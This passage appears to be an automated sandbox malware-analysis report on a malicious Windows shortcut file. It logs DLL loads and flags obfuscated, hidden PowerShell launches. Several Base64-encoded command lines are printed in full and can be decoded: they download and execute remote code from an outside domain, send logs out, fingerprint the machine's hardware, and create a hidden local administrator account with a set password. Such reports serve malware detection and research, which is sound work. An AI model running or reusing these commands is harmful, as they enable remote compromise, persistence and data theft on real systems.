        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
        Source: U82W1yZAYQ.lnkStatic file information: File size 17825792 > 1048576
        Source: Binary string: m.pdb4yO source: powershell.exe, 0000000D.00000002.3418771818.00000226FB897000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Found suspicious powershell code related to unpacking or dynamic code loading
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("RWdLejBnSkhOMGNtbHVaMEp2WkhrN0RRb2dJQ0FnYVdZb0pHZHNiMkpoYkRwS1RFSllVMXBJV2tWQkxteGxibWQwYUNBdFozUWdNU2tOQ2lBZ0lDQjdEUW9nSUNBZ0lDQWdkM0pwZEdVdGFHOXpkQ0FpYzJWdVpDQnNiMmNpT3cwS0lDQWdJQ0
        Obfuscated command line found
        Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /v /k "S^T^aR^T /M^I^n "" P^oWer^s^H^eL^l -W H^iDde^n -No^l^OGO -N^o^p -ep B^YPA^sS -eN^c^oDe^d^cOmMAn^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA="" && exit
        PowerShell case anomaly found
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWersHeLl -W HiDden -NolOGO -Nop -ep BYPAsS -eNcoDedcOmMAnd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA="
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWersHeLl -W HiDden -NolOGO -Nop -ep BYPAsS -eNcoDedcOmMAnd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA=" Jump to behavior
        Suspicious powershell command line found
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWersHeLl -W HiDden -NolOGO -Nop -ep BYPAsS -eNcoDedcOmMAnd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA="
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABmAGQAYQBhADAAMwA4AGEAZAA2AGMAMgBlAGUAYQA0ADUAMQAwADIAZQA3AGMAYQA5AGYAYQA0ADEANgA3ADgANQA4AGUAZgBlADkAZAA3ADkAOQA1AGYAMABjAGYANAAyAGYAMQBkAGEAOAAwADkAMAA0ADAAMgBjAGUAZgBjADIANQA1ADQAZABkAGQAYQBjAGQAMAAyAGEAYgBjADcAZgA5ADEAZABhADYANwA1ADEAYwBjAGMAZQA5ADAAZABkADQAOAA4ADcAYgAxADEANgA0ADUANQBlADQAOQBiAGUAOAAxAGQAYgAxADAAZgA4ADAAYgBhAGEAMQAxAGEANAAyADQAZgAwADAANQBkADYAZABiAGQAYQBkADcANQA0ADgANwA2AGQANQA5AGUANQBmADQANgAwAGIAMQBjADQAZgBmAGIAYQA5AGMAZABkADEAYQA0AGMAMwA5ADcAMAA1ADUAYQAwADIAOABlADAAMgA2ADIAMQBlADYAZAA0AGMAZQAxADQANABlADAAZgBlADgAMQA4AGIANwAwAGUANgAyADEAYwA5AGYANABmADgANwA2ADcAOQAxACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWersHeLl -W HiDden -NolOGO -Nop -ep BYPAsS -eNcoDedcOmMAnd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA=" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABmAGQAYQBhADAAMwA4AGEAZAA2AGMAMgBlAGUAYQA0ADUAMQAwADIAZQA3AGMAYQA5AGYAYQA0ADEANgA3ADgANQA4AGUAZgBlADkAZAA3ADkAOQA1AGYAMABjAGYANAAyAGYAMQBkAGEAOAAwADkAMAA0ADAAMgBjAGUAZgBjADIANQA1ADQAZABkAGQAYQBjAGQAMAAyAGEAYgBjADcAZgA5ADEAZABhADYANwA1ADEAYwBjAGMAZQA5ADAAZABkADQAOAA4ADcAYgAxADEANgA0ADUANQBlADQAOQBiAGUAOAAxAGQAYgAxADAAZgA4ADAAYgBhAGEAMQAxAGEANAAyADQAZgAwADAANQBkADYAZABiAGQAYQBkADcANQA0ADgANwA2AGQANQA5AGUANQBmADQANgAwAGIAMQBjADQAZgBmAGIAYQA5AGMAZABkADEAYQA0AGMAMwA5ADcAMAA1ADUAYQAwADIAOABlADAAMgA2ADIAMQBlADYAZAA0AGMAZQAxADQANABlADAAZgBlADgAMQA4AGIANwAwAGUANgAyADEAYwA5AGYANABmADgANwA2ADcAOQAxACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwA